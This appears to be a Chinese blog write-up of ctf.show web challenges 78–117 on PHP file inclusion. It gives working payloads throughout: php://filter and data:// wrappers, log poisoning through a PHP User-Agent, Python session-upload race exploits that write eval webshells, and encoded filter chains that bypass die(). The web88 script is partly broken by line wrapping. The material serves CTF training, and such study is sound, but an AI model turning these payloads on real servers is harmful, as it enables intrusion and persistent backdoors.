题目地址:https://ctf.show/challenges
身为web菜鸡的我,在做题的途中还是很容易碰到问题,//87和116经过尝试没有做出来,先占个坑,以后回来再刷...//(回来解出来了)

web78

hint:?file=php://filter/convert.base64-encode/resource=flag.php

PHP伪协议读取

payload:?file=php://filter/convert.base64-encode/resource=flag.php

web79

hint:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

然后查看源代码

web80

hint:包含日志文件 进行getshell 日志文件路径: ?file=/var/log/nginx/access.log
包含日志文件 进行getshell

日志文件路径:?file=/var/log/nginx/access.log
User Agent:<?php system('ls');?>
User Agent:<?php system('cat fl0g.php');?>
再查看源码即可得到flag

web81

同上

web82-86

hint:https://www.freebuf.com/vuls/202819.html 这道题有点像wmctf的make php great again 利用session对话进行文件包含利用 https://blog.csdn.net/qq_46091464/article/details/108021053

if(isset($_GET['file'])){

$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);

}else{

highlight_file(__FILE__);

}
利用session文件包含
exp:

import io
import sys
import requests
import threading

host = 'http://db1ceed2-e997-42ca-bb7a-14ef7922161a.chall.ctf.show/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

web87

hint:

https://www.leavesongs.com/PENETRATION/php-filter-magic.html https://xz.aliyun.com/t/8163#toc-3 php://filter/write=string.rot13/resource=2.php

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%2
5%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%
33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36
%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%3
3%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%
25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%

因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码
解题步骤:
我这用的是类似的:file是php://filter/write=convert.base64-decode/resource=1.php,content去除前面的两个用来填充的a后面base64解密就是<?php eval($_POST[0]);?>
payload如下:

file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2531%252e%2570%2568%2570

content=aaPD9waHAgZXZhbCgkX1BPU1RbMF0pOz8%2B

然后蚁剑连接1.php,密码为写入的0
最后在fl0g.php中找到flag

web88

hint:发现过滤的还是比较多,但是没有过滤 : 那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;base64,poc 其实和79差不多 只是注意的是编码成base64的时候要去掉 =

import io
import requests
import threading
sessID = 'flag'
url = 'http://77f10aa2-a5ca-4ab6-9f42-6e43e5717207.chall.ctf.show/'
def write(session):
while True:
f = io.BytesIO(b'a' * 256 * 1) #建议正常这个填充数据大一点
response = session.post(url,
cookies={'PHPSESSID': sessID},
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac
*.php");?>'},
files={'file': ('a.txt', f)}
)
def read():
while True:
response = session.get(url+'?file=/tmp/sess_{}'.format(sessID))
if 'flag' in response.text:
print(response.text)
break
session = requests.session()
write = threading.Thread(target=write, args=(session,))
write.daemon = True #当daemon为True时,父线程在运行完毕后,子线程无论是否正在运行,都
会伴随主线程一起退出。
write.start()
read()

实际上就是去掉base64后的=,作为填充使用,不影响结果

?file=data:text/plain,<?php phpinfo()?>
//base64取出=
?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4
payload
?file=data:text/plain;base64,<?php system('ls');?>//该句转换后不可执行因为有+
?file=data:text/plain;base64,<?php system('cat *.php'); ?>
?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgKi5waHAnKTs/Pg

web116

打开发现是一个香港电影混剪,看完之后发现还是挺不错的,直接用BP文件包含一下得到源码

GET /index.php?file=/var/www/html/index.php

源码 :

<?php
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"5.mp4";
filter($file);
header('Content-Type: video/mp4');
header("Content-Length: $file");
readfile($file);
?>

再尝试直接包含flag.php flag就出来了

web117

hint:payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=??
注:利用方法和环境有关,因为每个人机器环境变量不同。就有不同的效果。
知识点:
https://www.cnblogs.com/harrymore/p/5121444.html

https://blog.51cto.com/allenh/1695810

${PATH:1:1}来获得字母

${#PATH} 来统计字母个数
和web87类似,尝试除rot13和base64绕过die的方式

看web87推荐的第二个链接

payload

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=??
再输入url/a.php
可以传入1=phpinfo();测试一下
再传参1=system('cat flag.php');查看源码得flag

标签: none

暂无评论